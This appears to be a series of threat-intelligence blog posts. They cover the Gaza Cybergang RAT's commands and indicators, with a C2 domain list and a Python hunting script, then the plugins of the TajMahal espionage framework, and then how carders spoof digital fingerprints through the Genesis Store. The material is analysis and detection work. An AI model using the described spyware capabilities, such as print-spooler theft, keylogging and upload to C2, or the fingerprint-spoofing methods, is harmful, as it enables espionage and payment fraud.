  • KEYWORD: Downloads encrypted strings from the /Feed page on the server that represent specific keywords of interest; matching files are compressed and encrypted with WinRAR, with “Keyword” appended to the file name, and uploaded to the C2 with a POST to “/FeedBack.php”. FeedBack.php validates the sender by User-Agent, saves the data in the “RAR” server directory and stores the metadata in the MSSQL database for later reference.
  • KEY: Triggers upload of all gathered data to the C2 with a POST to “/log.php”. Log.php validates the sender by User-Agent, saves the data in the “UP” server directory and stores the metadata in the MSSQL database for later reference.
  • KEYS: Deletes the file named tempPath + “ky” so that nothing is uploaded.
  • REUPLOAD: Re-uploads recent data to the C2 server with a POST to “/FeedBack.php”.
  • RESTARTME: Restarts the RAT application process.
  • BLOCK: Creates a file in the Temp path named “Block~” + PCID to kill the RAT.
  • SCREEN: Takes a PNG screenshot of the main screen, names the file with a timestamp, and uploads it to the C2 with a POST to “/FeedBack.php”.
  • LAN: Creates a file in the Temp path named “LA” + PCID, possibly to spread through the LAN. Note: this seems to refer to an unloaded feature/module of the RAT that is not currently in use.
  • LANS: Deletes the file created by the LAN command to reverse its effect.
  • USB: Creates a file in the Temp path named “us” + PCID, then invokes another program module named Remo.test to identify removable drives.
  • USBS: Deletes the file created by the USB command to reverse its effect.
  • HD: Creates a file in the Temp path named “hd” + PCID, then invokes another program module named hd.test1 to identify logical drives.
  • HDS: Deletes the file created by the HD command to reverse its effect.
  • SHUTDOWN: Shuts down the system with shutdown /s /t 0 run through cmd.
  • RESTART: Reboots the system with shutdown /r /t 0 run through cmd.
  • PROCANDSOFT: Lists all active processes and all installed software and uploads the results to the C2 with a POST to “/log.php”.
  • DEL-TEMP: Deletes all files in the “AppData/Local/Temp” path.
  • RAR: Creates RAR files per logical drive containing data with timestamps from the past 7 days, then uploads them to the C2 with a POST to “/FeedBack.php”.
  • RARM: Creates RAR files per logical drive containing data with timestamps from the past 30 days, then uploads them to the C2 with a POST to “/FeedBack.php”.
  • RARW: Creates RAR files per logical drive containing data with timestamps from the past 7 days, then uploads them to the C2 with a POST to “/FeedBack.php”.
  • KILL: Kills system processes.

Infrastructure

In 2018, the threat actor mostly relied on a single C2 server and rotated a multitude of domain names over time. The attacks’ different stages, however, were hosted on a variety of free sites such as Mailimg, Github, Pastebin, dev-point.co, a.pomf.cat, and upload.cat.

The phishing email infrastructure though relied on disposable email providers such as bit-degree.com, mail4gmail.com, careless-whisper.com and others.
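Two of the observables described above are cheap to hunt for: the RAT’s POST check-ins to the /FeedBack.php and /log.php handlers on the rotating C2 domains, and the marker files and bot-ID staging directory its commands leave in %TEMP%. The script below is an added example written for this page, not the group’s code or Kaspersky’s detection logic. The proxy-log layout, the sample lines and the %TEMP% listing are constructed, and the PCID format is assumed to be the 32-hex bot ID the RAT uses for its staging folder; the post does not state it.

```python
"""Hunting for Gaza Cybergang Group1 RAT traces in proxy logs and %TEMP%.

Added example for this post; it is neither the group's code nor Kaspersky's detection logic.
The proxy-log layout, the sample lines and the PCID format (assumed to be the 32-hex bot ID)
are assumptions, not taken from the post.
"""
import re
from urllib.parse import urlsplit

# Rotating C2 domains listed in Appendix II of the post.
C2_DOMAINS = {
    "dji-msi.2waky.com", "checktest.www1.biz", "fulltest.yourtrap.com",
    "microsoft10.compress.to", "mmh.ns02.us", "ramliktest.mynetav.org",
    "testhoward.mysecondarydns.com", "testmace.compress.to",
    "time-loss.dns05.com", "wiknet.mooo.com", "wiknet.wikaba.com",
    "supports.mefound.com",
}
# Server-side handlers the RAT POSTs to: KEYWORD/SCREEN/RAR* -> /FeedBack.php, KEY/PROCANDSOFT -> /log.php.
C2_PATHS = {"/feedback.php", "/log.php"}

# Constructed proxy-log layout: <timestamp> <client_ip> <method> <url> <status> "<user-agent>"
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')


def parse_proxy_line(line):
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, status, ua = m.groups()
    u = urlsplit(url)
    return {"ts": ts, "client": client, "method": method.upper(),
            "host": (u.hostname or "").lower(), "path": u.path,
            "status": int(status), "ua": ua}


def flag_c2_posts(lines):
    """(client, host, path, confidence) for every POST to a RAT upload handler.

    'high' = known C2 domain; 'low' = same handler name on an unlisted host, still worth
    a look because the group rotates domains faster than IOC lists get updated.
    """
    hits = []
    for line in lines:
        rec = parse_proxy_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if rec["path"].lower() not in C2_PATHS:
            continue
        confidence = "high" if rec["host"] in C2_DOMAINS else "low"
        hits.append((rec["client"], rec["host"], rec["path"], confidence))
    return hits


HEX32 = r"[0-9a-f]{32}"
# BLOCK / LAN / USB / HD each drop prefix + PCID in %TEMP%; PCID as 32 hex chars is an assumption.
MARKER_RE = re.compile(rf"^(Block~|LA|us|hd)({HEX32})$", re.I)
BOTDIR_RE = re.compile(rf"^{HEX32}$", re.I)


def flag_temp_artifacts(entries):
    """entries: (name, is_dir) pairs from a %TEMP% listing -> [(name, what_it_is)]."""
    found = []
    for name, is_dir in entries:
        if is_dir:
            if BOTDIR_RE.match(name):
                found.append((name, "bot-ID staging directory (per-category RARs before upload)"))
        elif m := MARKER_RE.match(name):
            found.append((name, f"'{m.group(1)}' command marker for bot {m.group(2)[:8]}"))
        elif name.lower() == "ky":
            found.append((name, "upload-trigger file (the KEYS command deletes it)"))
    return found


# Constructed samples, not data from the post.
SAMPLE_LOG = [
    '2019-01-14T09:12:03Z 10.0.0.15 GET http://www.example.org/news 200 "Mozilla/5.0"',
    '2019-01-14T09:12:41Z 10.0.0.15 POST http://time-loss.dns05.com/FeedBack.php 200 "Mozilla/4.0 (compatible; MSIE 6.0)"',
    '2019-01-14T09:13:02Z 10.0.0.15 POST http://time-loss.dns05.com/log.php 200 "Mozilla/4.0 (compatible; MSIE 6.0)"',
    '2019-01-14T09:15:00Z 10.0.0.22 POST http://cdn.example.net/log.php 200 "Mozilla/5.0"',
    '2019-01-14T09:16:00Z 10.0.0.22 POST http://www.example.org/FeedBack.php?x=1 404 "curl/7.64.0"',
]
SAMPLE_TEMP = [
    ("Block~3f2a9c0e1d4b5a6f7e8d9c0b1a2f3e4d", False),
    ("us3f2a9c0e1d4b5a6f7e8d9c0b1a2f3e4d", False),
    ("3f2a9c0e1d4b5a6f7e8d9c0b1a2f3e4d", True),
    ("~DF1234.tmp", False),
    ("hd", False),
]

if __name__ == "__main__":
    for hit in flag_c2_posts(SAMPLE_LOG):
        print("C2 POST:", hit)
    for art in flag_temp_artifacts(SAMPLE_TEMP):
        print("TEMP artifact:", art)
```

Because the C2 handlers check the User-Agent, the UA string of a confirmed hit is itself a useful pivot once you have one confirmed host: the same UA on other clients POSTing to the same two paths is the next thing to look for. The low-confidence matches exist for exactly that reason; on their own, /log.php is too common a path to act on.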


Based on the analyzed metrics, the victims were spread across 39 countries and reached 240+ unique victims. The Palestinian Territories host the majority of the victims, followed by Jordan, Israel, then Lebanon, as noted in the below table.

The most targeted entities are embassies, government entities, education, media outlets, journalists, activists, political parties or personnel, healthcare and banking.

Country | Number of victims
Palestinian Territories | 110
Jordan | 25
Israel | 17
Lebanon | 11
Saudi Arabia | 9
Syria | 9
Egypt | 7
UAE | 6
Senegal, France, Germany, Iran, Malaysia, Belgium, Bosnia and Herzegovina, Libya, Morocco, Spain, Sri Lanka, Tunisia, Afghanistan, Armenia, Azerbaijan, Cyprus, India, Indonesia, Iraq, Ireland, Italy, Kuwait, Oman, Poland, Romania, Russia, Serbia, Slovenia, Sudan, UK, USA | fewer than 5 each

Conclusions

While Gaza Cybergang Group1 described in this post looks like a low sophistication group, with limited infrastructure and attack files that can be found in the wild, they are the most relentless in their attacks, with continuous targeting and high malleability. This has allowed the group to achieve reasonable success against a relatively wide array of victims.

Gaza Cybergang is evolving and adapting to the MENA region – a complex setting with complex requirements. The attacks are now divided into three groups with different levels of sophistication and different levels of targeting. We expect the damage caused by these groups to intensify and the attacks to extend into other regions that are also linked to the complicated Palestinian situation. The attackers also seem to be within reach of more advanced tools, techniques and procedures, and we expect them to rely more on these in future attacks. More information on Desert Falcons (Group2) and Operation Parliament (Group3) will be presented in future publications.

Appendix I – Main historical checkpoints and politicized decoys, Gaza Cybergang Group1 2016-2019

MD5 hash | First seen | Filename/decoy | Translation/explanation | C2 server
B3a472f81f800b32fe6595f44c9bf63b | Feb 2016 | برقية وزارة الخارجية التركية لسيادتكم حول موضوع هام.exe | Translation: Letter for you from the Turkish Ministry of Foreign Affairs on Russian military operations in Syria | en.gameoolines.com
Df3f3ad279ca98f947214ffb3c91c514, e8a29c7a6f6c0140152ca8a01e336b37 | March 2016 | president abu mazen meetings with khaled meshaal.lha | – | dw.downloadtesting.com
f9bcc21fbb40247167c8c85ed6ef56e3 | March 2016 | دراسة.lha | Translation: Study | Dl.topgamse.com
D9dbb65a42ffe0575f0e99f7498a593e | April 2016 | برقية الخارجية السعودية لسيادتكم يرجي الإطلاع – مهم.exe | Translation: Saudi Foreign Affairs telegram for you, please see – important.exe | en.gameoolines.com
221EEF8511169C0496BBC79F96E84A4A | April 2016 | تقرير السعودية والمعلومات المتوفر – ونستكمل عند التوفر.exe | Translation: Report on Saudi available information, to be updated with new info upon availability | dw.downloadtesting.com
62DF4BC3738BE5AD4892200A1DC6B59A (inside: 55d33d9da371fdfe7871f2479621444a) | May 2016 | معلومات عن هجوم محتمل من الحوثيين على مواقع سعودية – خاص.exe | Translation: Information on possible attack by Houthis on Saudi sites – private | dw.downloadtesting.com
838696872F924D28B08AAAA67388202E | May 2016 | عاجل المخابرات المصرية.exe | Translation: Urgent Egyptian Intelligence | dw.downloadtesting.com
e8be9843c372d280a506ac260567bf91 | May 2016 | برقية وزارة الخارجية السعودية.exe | Translation: Saudi Foreign Affairs telegram.exe. Message on the 34th GCC for Interior Ministers. | Wiknet.wikaba.com, Wiknet.mooo.com
55d33d9da371fdfe7871f2479621444a | May 2016 | نموذج ترشيج الدورة الخاصة .rar | Translation: Form for private training selection. Application for a certain legal training program for judges in the UAE | dw.downloadtesting.com
e782610bf209e81ecc42ca94b9388580 | July 2016 | عاجل – مؤتمر ايران.exe | Translation: Urgent – Iran conference | dw.downloadtesting.com
5db18ab35d29d44dda109f49d1b99f38 | June 2017 | פרצת פרטיות בכרום מאפשרת לאתרים להקליט אתכם ללא ידיעתכם.exe | Translation: A privacy breach in Chrome allows sites to record you without your knowledge | Wiknet.wikaba.com, wiknet.mooo.com
Dae24e4d1dfcdd98f63f7de861d95182 | June 2017 | مراسلات العتيبة.. وثائق ومعلومات.exe | Translation: Al Otaiba correspondence. Documents and information. Explanation: Yousef Al Otaiba is the current United Arab Emirates ambassador to the United States and Minister of State. The decoy discusses leaks of his emails that were reported in 2017. | Wiknet.wikaba.com, wiknet.mooo.com
2358dbb85a29167fa66ee6bf1a7271cd | April 2018 | كتاب وزارة الخارجية الإماراتية لسيادتكم.exe | Translation: Book of the UAE MOFA for you. Explanation: Document that looks as if it comes from the UAE MOFA, discussing a political meeting between GCC countries and the EU in Belgium | dw.downloadtesting.com
10dfa690662b9c6db805b95500fc753d | Sept 2018 | محضر اجتماع على الهاتف بين رئيس المكتب السياسي لحركة حماس اسماعيل هنية ورئيس المخابرات المصرية.exe | Translation: Minutes of a phone call between the head of the political bureau of Hamas Ismail Haniya and the head of Egyptian intelligence | Upload.cat (download site)
6b5946e326488a8c8da3aaec2cb6e70f | Sept 2018 | – | Explanation: Document discusses a radio talk by Khalid ‘Abd al-Majid, head of a breakaway faction of the Palestinian Popular Struggle Front, a minor left-wing group within the Palestinian Liberation Organization. He talks about an agreement between al-Nusra and ISIS militants to leave the Palestinian Yarmouk camp in Syria. | Wiknet.wikaba.com, Wiknet.mooo.com
342a4d93df060289b2d8362461875905 | Oct 2018 | تسريب من داخل القنصلية السعودية حول مقتل جمال خاشقجي.exe | Translation: Leak from the Saudi consulate on the death of Jamal Khashoggi | Time-loss.dns05.com
c9cae9026ee2034626e4a43cfdd8b192 | Jan 2019 | محضر اجتماع السفير القطري العمادي مع الوفد المصري في رام الله .exe | Translation: Minutes of meeting of Qatari Ambassador Emadi with the Egyptian delegation in Ramallah | Time-loss.dns05.com, dji-msi.2waky.com

Appendix II – Indicators of compromise

Type | IoC | Description
RAR md5 | E686FFA90B2BFB567547F1C0DAD1AE0B | Stage 1 executable / lure
RAR md5 | CE5AA4956D4D0D66BED361DDD7DB1A3B | Stage 1 executable / lure
RAR md5 | 4F34902C9F458008BAE26BFA5C1C00DA | Stage 1 executable / lure
RAR md5 | 535F8EA65969A84A68CEAF88778C6176 | Stage 1 executable / lure
RAR md5 | E8A29C7A6F6C0140152CA8A01E336B37 | Stage 1 executable / lure
RAR md5 | E782610BF209E81ECC42CA94B9388580 | Stage 1 executable / lure
RAR md5 | F9BCC21FBB40247167C8C85ED6EF56E3 | Stage 1 executable / lure
EXE md5 | 33369AFD3042326E964139CABA1888D3 | Stage 2 executable (19182-exe) that invokes the Pastebin chain
EXE md5 | 2AD88AE20D8F4CB2C74CAE890FEB337A | Stage 2 executable (1918-exe) that invokes the Pastebin chain
EXE md5 | 55929FF3E67D79F9E1E205EBD38BC494 | Stage 2 executable (21918-exe) that invokes the Pastebin chain
EXE md5 | DA486DF0D8E03A220808C3BFA5B40D06 | Stage 2 executable (Adope-exe) that invokes the Pastebin chain
EXE md5 | C7F98F890B21C556D16BFF55E33C33AB | Stage 2 executable (Application-exe) that invokes the Pastebin chain
EXE md5 | FAFCC11AF99ACF1B70997BC4BF36CFC0 | Stage 2 executable (bind-exe): a backdoored Tile Slide Puzzle computer game that invokes the Pastebin chain; the game’s code is freely available
EXE md5 | 28CACBF64141F50426830B385AB1BE4C | Dell-cmd: command string to delete the user Temp directory
EXE md5 | F30C00E87C7EE27033DC0AC421F3B4F8 | Stage 2 executable (D-exe) that invokes the Pastebin chain
EXE md5 | 51A59AEC24B5046EC4615728A5B52802 | Stage 2 executable (Dv-exe) that invokes the Pastebin chain
EXE md5 | 98BDE191AE6E2F7D8D4166C4B21A27D2 | Office-vbs: github.gist lolpoke/system1
EXE md5 | 9E152A6ADCB57D44284AF3B6FD0C94C2 | Stage 2 executable (p0w-exe) that invokes the Pastebin chain
EXE md5 | CAB62BB5F00FE15683C6AF760C8E8F7E | wPic4-exe: RAT executable similar to Pictures4.exe
EXE md5 | 192DD65864119017AA307BE3363E31BB | Powe1-exe: executable that uses scheduled tasks to execute VB scripts
EXE md5 | 71E462260F45C5E621A5F5C9A5724844 | WinPeggy4-exe: backdoored Peggy Bees computer game; source code available on the Microsoft site
EXE md5 | AB98768D2440E72F42FCD274806F8D2A | WinPeggy-exe: another variant of WinPeggy4.exe
EXE md5 | DAACE673B1F4DFE8A4D3D021C5190483 | Word-hta: VBS code to invoke PowerShell from github.gist..0lol0/system1.ps1
EXE md5 | 1529AE427FE4EB2D9B4C3073B2AA9E10 | Word-vbs: VBS code to invoke PowerShell from github.gist lolpoke/system1.ps1
PowerShell md5 | CCD324DF0F606469FCA3D1C6FFA951AD | System1.ps1: PowerShell script that invokes a binary in memory which uses NETSH commands to allow programs, then executes a Trojan downloaded from myftp[.]biz
PowerShell md5 | D153FF52AE717D8CF26BEF57BDB7867D | Install.ps1: PowerShell script that invokes a Cobalt Strike beacon
EXE md5 | AD1C91BF5E7D1F0AAF2E4EFB8FB79ADE | Stage 2 executable (res-vbs) that invokes the Pastebin chain
EXE md5 | EE3AD5B06DBC6CCA7FDC9096697A9B4A | Re-vbs: VBS script that uses Pastebin data to create a scheduled task and run JScript to invoke the RAT
EXE md5 | 805CA34E94DA9615C13D8AF48307FB07 | Folder.exe: another RAT variant based on the Pastebin chain
EXE md5 | F330703C07DDD19226A48DEBA4E8AA08 | Stage 2 executable (shell-exe) that invokes the Pastebin chain
EXE md5 | CFD2178185C40C9E30AADA7E3F667D4B | Another RAT variant based on the Pastebin chain
EXE md5 | C2EE081EC3ADEF4AFACAB1F326EE50FF | 2poker2.exe: uses a PowerShell command to invoke a base64 string from Pastebin and create another RAT variant
EXE md5 | B3A472F81F800B32FE6595F44C9BF63B | Stage 1 executable / lure
EXE md5 | DF3F3AD279CA98F947214FFB3C91C514 | Stage 1 executable / lure
EXE md5 | 221EEF8511169C0496BBC79F96E84A4A | Stage 1 executable / lure
EXE md5 | 62DF4BC3738BE5AD4892200A1DC6B59A | Stage 1 executable / lure
EXE md5 | 55D33D9DA371FDFE7871F2479621444A | Stage 1 executable / lure
EXE md5 | 838696872F924D28B08AAAA67388202E | Stage 1 executable / lure
EXE md5 | E8BE9843C372D280A506AC260567BF91 | Stage 1 executable / lure
EXE md5 | D9DBB65A42FFE0575F0E99F7498A593E | Stage 1 executable / lure
EXE md5 | 5DB18AB35D29D44DDA109F49D1B99F38 | Stage 1 executable / lure
EXE md5 | DAE24E4D1DFCDD98F63F7DE861D95182 | Stage 1 executable / lure
EXE md5 | 2358DBB85A29167FA66EE6BF1A7271CD | Stage 1 executable / lure
EXE md5 | 10DFA690662B9C6DB805B95500FC753D | Stage 1 executable / lure
EXE md5 | 6B5946E326488A8C8DA3AAEC2CB6E70F | Stage 1 executable / lure
EXE md5 | 342A4D93DF060289B2D8362461875905 | Stage 1 executable / lure
EXE md5 | C9CAE9026EE2034626E4A43CFDD8B192 | Stage 1 executable / lure
Network | dji-msi.2waky.com | External C2 domain; rotates with the others over time
Network | checktest.www1.biz | External C2 domain; rotates with the others over time
Network | fulltest.yourtrap.com | External C2 domain; rotates with the others over time
Network | microsoft10.compress.to | External C2 domain; rotates with the others over time
Network | mmh.ns02.us | External C2 domain; rotates with the others over time
Network | ramliktest.mynetav.org | External C2 domain; rotates with the others over time
Network | testhoward.mysecondarydns.com | External C2 domain; rotates with the others over time
Network | testmace.compress.to | External C2 domain; rotates with the others over time
Network | time-loss.dns05.com | External C2 domain; rotates with the others over time
Network | wiknet.mooo.com | External C2 domain; rotates with the others over time
Network | Wiknet.wikaba.com | External C2 domain; rotates with the others over time
Network | supports.mefound.com | External C2 domain; rotates with the others over time
Network | saso10.myftp.biz | External C2 server used by PowerShell scripts to download malware
Network | – | External C2 server (most active)
Network | – | External C2 server (least active)
Network | – | External C2 server (least active)
Network | – | External C2 server (least active)

The IP addresses of the C2 servers are not reproduced on this page.

Project TajMahal – a sophisticated new APT framework

10 April 2019 - 05:10

Executive summary

‘TajMahal’ is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named ‘Tokyo’ and ‘Yokohama’. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim’s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins we’ve ever seen for an APT toolset.

Just to highlight its capabilities, TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue. It can also request to steal a particular file from a previously seen USB stick; next time the USB is connected to the computer, the file will be stolen.

TajMahal has been developed and used for at least the past five years. The first known ‘legit’ sample timestamp is from August 2013, and the last one is from April 2018. The first confirmed date when TajMahal samples were seen on a victim’s machine is August 2014.

More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky.com).

Technical details

We have discovered two different types of TajMahal packages, self-named Tokyo and Yokohama. The targeted systems found by Kaspersky Lab were infected with both packages. This suggests that Tokyo was used as the first-stage infection, deploying the fully functional Yokohama package on interesting victims, and was then left in place as a backup. The packages share the same code base; we identified the following interesting features:

  • Capable of stealing documents sent to the printer queue.
  • Data gathered for victim recon includes the backup list for Apple mobile devices.
  • Takes screenshots when recording VoiceIP app audio.
  • Steals written CD images.
  • Capable of stealing files previously seen on removable drives once they are available again.
  • Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies.
  • If deleted from Frontend file or related registry values, it will reappear after reboot with a new name and startup type.

So far we have detected a single victim based on our telemetry – a diplomatic entity from a country in Central Asia.


The TajMahal framework is an intriguing discovery that’s of great interest, not least for its high level of technical sophistication, which is beyond any doubt. The huge number of plugins implementing such a range of features is something we have never before seen in any other APT activity. For example, it has its own indexer and emergency C2s, and it is capable of stealing specific files from external drives when they become available again.

The question is, why go to all that trouble for just one victim? A likely hypothesis is that there are other victims we haven’t found yet. This theory is reinforced by the fact that we couldn’t see how one of the files in the VFS was used by the malware, opening the door to the possibility of additional versions of the malware that have yet to be detected.

Kaspersky Lab products detect the TajMahal APT samples as HEUR:Trojan.Multi.Chaperone.gen

Appendix I – Indicators of compromise

A full set of IOCs and Yara rules is available to customers of Kaspersky Intelligence Reporting service – contact intelreports@kaspersky.com

Domains and IPs

File Hashes

Appendix II – Additional technical details

The following table provides the full list of files stored in the VFS with a short description describing what the plugins do:

Index (nn), file name, short description:

  • 00/01 cs64.dll, cs32.dll: C2 communication and command processing. WatchPoints document stealer.
  • 02/03 li64.dll, li32.dll: LocalInfo. Collects a large amount of information, titled “TAJ MAHAL”.
  • 04/06 ad64.dll, ad32.dll: AudioRecorder. Microphone, Voice IP applications.
  • 07/08 le64.dll, le32.dll: Open source-based LAME mp3 encoder (“Mar 27 2014”) used by the AudioRecorder plugins (adXX.dll).
  • 09 dd.m: MP3 file sent by AudioRecorder (adXX.dll) when the cache is cleared.
  • 10/11 me64.dll, me32.dll: AudioRecorder for Windows Metro applications. Injects ma32.dll into “wwahost.exe” or “audacity.exe”.
  • 12 ma32.dll: AudioRecorder for Windows COM. Hooks IAudioClient, IAudioRenderClient, IMMDevice.
  • 13/14 ams_api64.dll, ams_api32.dll: Handy wrapper around the API of exXX.dll, pdXX.dll, sgXX.dll.
  • 15/16 ex64.dll, ex32.dll: Orchestrator. Update/install/uninstall, selects target processes and loads plugins.
  • 17/18 fe64.dll, fe32.dll: Template of the “Yokohama” Frontend module; used for reinstalling.
  • 19/20 pd64.dll, pd32.dll: Provides API to access configuration settings, working files, egress queue.
  • 21/22 libpng64.dll, libpng32.dll: Open source “libpng” library version 1.5.8 (February 1, 2012). Used by the Screenshoter plugin (ssXX.dll).
  • 23/24 rs64.dll, rs32.dll: Reinstaller/Injector.
  • 25/26 ix32.dll, ix64.dll: LoadLibrary call template DLL used by the Reinstaller/Injector plugin (rsXX.dll) for injecting a LoadLibrary call into running processes.
  • 05/28 obj32.bin, obj64.bin: Shellcode template used by the Reinstaller/Injector (rsXX.dll) and AudioRecorder4MetroApp (meXX.dll) for injecting into running processes. Both versions of “obj32.bin” are the same; it seems to be stored twice by mistake.
  • 29/30 sc64.dll, sc32.dll: Utility library. Provides API for cryptography, file, registry, memory management operations and so on.
  • 31/32 sg64.dll, sg32.dll: Library for managing the egress queue (files and messages prepared to send to the C2).
  • 33/34 st64.dll, st32.dll: SuicideWatcher. Watches the uninstall time, checks the time difference (local time vs internet time).
  • 35/36 zip64.dll, zip32.dll: Open source “XZip/XUnzip” library by Info-Zip + Lucian Wischik + Hans Dietrich. Used by the Indexer (inXX.dll) and C2 communication (csXX.dll) plugins.
  • 37/38 zlib64.dll, zlib32.dll: Open source “zlib” version 1.2.3 used by libpngXX.dll for compressing screenshots (ssXX.dll).
  • 39 il32.dll: IM-Stealer. Steals conversation content from chat windows of instant messaging applications.
  • 40/55 in32.dll, in64.dll: Indexer. Indexes files on victim drives, user profiles, removable drives. Built index files are zipped (by zipXX.dll) and put in the send queue.
  • 41/56 isys9core_64.dll, isys9_64.dll: Proprietary “ISYS Search Software” components used by the Indexer plugin. Licensee_ID1 “Q5GXU H5W67 23B4W SCQFD 4G7HV 9GSLW”, Licensee_ID2 “objectviewer.exe”.
  • 45/54 sqlite3_64.dll, sqlite3_32.dll: Open source “sqlite” library. Used by “ISYS Search”.
  • 57/58 tn32.dll, tn64.dll: Thumbnailer. Makes and prepares to send thumbnails of found picture files.
  • 59/62 freeimage_32.dll, freeimageplus_64.dll: FreeImage open source library supporting popular graphics image formats (ver 3.15.4 2012-10-27) (http://freeimage.sourceforge.net). Used by the Thumbnailer (tnXX.dll) plugin.
  • 63/64 ku64.dll, ku32.dll: Keylogger & clipboard monitor.
  • 65/66 pm64.dll, pm32.dll: Steals printed documents from the spooler queue. This is done by enabling the “KeepPrintedJobs” attribute for each configured printer stored in the Windows Registry: key “SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\Printers”, value “Attributes”.
  • 67/68 rc64.dll, rc32.dll: EgressSender. Sends files from the output queue to the C2.
  • 69/70 rn64.dll, rn32.dll: Daily “ClientRecon” (ComputerName, OS information, MacAddress, WirelessNetwork keys, connected Apple devices, Apple mobile devices backups list, IE version, SecurityCenterInfo (AV, Firewalls and AntiSpyware products), Hardware info, Installed software including Metro Apps, Users, Autoruns). Checks and sends to the C2 if something changed.
  • 71/72 ss64.dll, ss32.dll: Screenshoter. Periodic low-resolution screenshots. High-resolution screenshots of specified process windows and when recording VoiceIP application audio. See the “ss_pr” & “ss_wt_nm” cfg vars.
  • 73/74 vm32.dll, vm64.dll: Steals documents from fixed and removable drives. Watches the CDBurnArea and steals written CD images.
  • 75/76 wc64.dll, wc32.dll: Periodically makes webcamera snapshots.
  • 77 default.cfg: Default configuration settings file.
  • 78 runin.bin: List of process names and the associated plugins that should be run inside these processes.
  • 79 morph.dat: Configuration file storing the path of work folders and registry keys.

Digital Doppelgangers

9 April 2019 - 09:25

Carding has existed for over 20 years, and it is not dead yet. It is alive and, more than that, it is still being actively developed by cybercriminals. The “good” old method of entering stolen credit card information into online store forms to buy goods and services, or of using online payment system accounts for the same purpose, still works like a charm. Of course, the process has become more sophisticated, and it is certainly not as easy as it was 10 years ago, but unfortunately it is still possible.

Modern financial cyberfraud, the sophisticated targeted attacks on banks such as Carbanak and Silence, the hundreds of families of banking Trojans: it all started with the carding forums many years ago. Carding is the cradle of modern financial cybercrime. As before, bank cards, payment systems and online banking fraud are the most valuable criminal sources of wealth.

A study by Juniper Research estimates that losses from online payment frauds will reach 43 billion USD by 2023, up from 22 billion USD in 2018, making anti-fraud and cybersecurity measures a top concern for the industry. And this is not surprising – every day cybercriminals develop new methods and tools to bypass anti-fraud protection systems, they develop malware to help them in their activities, create services and stores, discuss ways to defeat protection mechanisms on Darknet forums and channels. From the famous Cardingplanet forum to Darknet stolen card stores – financial cybercrime schemes were not dead at all during all these years. They have evolved and become more dangerous than ever.

Digital fingerprint protection

How do modern anti-fraud systems protect users from online fraud? They employ various models and combinations of multiple technical and analytical methods. But in simple terms, any anti-fraud system must identify a fraudster and block his attempt to accomplish an illegal transaction involving a bank card or payment system account. To identify fraudsters and separate them from legitimate buyers the anti-fraud system uses various mechanisms designed to verify the user’s digital identity mask, and if it knows this mask to be legitimate or the mask is a new and unique one, it will not throw the “red flag”. As a result, the user behind the mask is recognized to be a legitimate one, and his query, such as an attempt to make a purchase using the provided bank card details, will be approved. If the user’s digital identity appears suspicious, the transaction will be canceled or put on hold for an additional manual check. Additional authentication typically includes a request to provide extended information like bank card expiry date or CVV number, or possibly also a verification call from the online store or payment system operator for voice verification.

As such, the user’s digital identity is a digital fingerprint – a combination of system attributes that are unique to each device and personal behavioral attributes of the user himself. The first part, the device fingerprint, includes:

  • IP address (external and local)
  • Screen information (screen resolution, window size)
  • Firmware version
  • Operating system version
  • Browser plugins installed
  • Timezone
  • Device ID
  • Battery information
  • Audio system fingerprint
  • GPU info
  • WebRTC IPs
  • TCP/IP fingerprint
  • Passive SSL/TLS analysis
  • Cookies
  • and many more

The device may have over 100 attributes used for browsing.

The second part of the digital identity is the behavioral analysis. Modern anti-fraud solutions analyze the user’s social network accounts (third-party cookies check) and various aspects of his/her behavior, including:

  • Time spent at online store website
  • Clicks on website location
  • Interest-related behavior (items of interest, typical amount of money spent, digital or real merchandise, etc.)
  • Mouse/touchscreen behavior
  • System configuration changes

The anti-fraud system may “red flag” various tricks, but the main idea is to make sure that the user’s collected digital identity has been used for transactions before and those transactions were legitimate, or that the digital fingerprint is completely unique and being used for the first time. This is why, if a cybercriminal uses the same machine for multiple attempts to buy from the same online shop using different bank card details or stolen payment system login/password pairs, such illegal transactions will be declined. Anti-fraud systems can also check the user’s collected fingerprint against a local database of fraudster device fingerprint patterns and, if any of them matches the one being used for the purchase attempt, the transaction will be blocked immediately.

Fingerprint example

But the bad guys are always looking for ways to defeat the anti-fraud safeguards. They do in-depth research to find out how anti-fraud systems work, and they analyze browser traffic with local intercepting proxies to understand the protection system’s scripts and queries. They study the information gathered from devices to create unique digital fingerprints of their users.

The next thing they do is try to substitute the system’s real fingerprint with the fake one. They try to manipulate queries and supply unique values in response to every query from the anti-fraud mechanism. Or, as a more advanced alternative, they substitute the requested values with the already existing ones – stolen from someone else’s PC.

Genesis Store

Cybercriminals soon became aware that unique fingerprints from users’ PCs make valuable information useful to many of their own kind. They began devising malware to steal fingerprints from users’ machines and selling such fingerprints along with other stolen data from the same machines, including user accounts, logins, passwords and browser cookies collected from various online services – from stores and payment systems to bank accounts. With our cybercrime threat intelligence technologies we were able to identify and analyze the biggest marketplace for this kind of data – the Genesis Store.

Genesis Store is an invitation-only private online market for stolen digital fingerprints. At the moment it offers more than 60,000 stolen bot profiles. A profile includes browser fingerprints, website logins and passwords, cookies and credit card information. The price varies from 5 to 200 dollars per profile and depends heavily on the value of the stolen information: if the bot includes a login/password pair for an online bank account, for example, the price is higher. As the marketplace owners have explained in their Darknet forum thread, the price is calculated automatically by a proprietary algorithm.

Genesis Store homepage

Bots for sale

Genesis Store has a configurable search panel that allows searching for specific bots. Logins and passwords from a particular website, the victim’s country, operating system, date the profile first appeared at the market – everything is searchable.

Genesis search panel

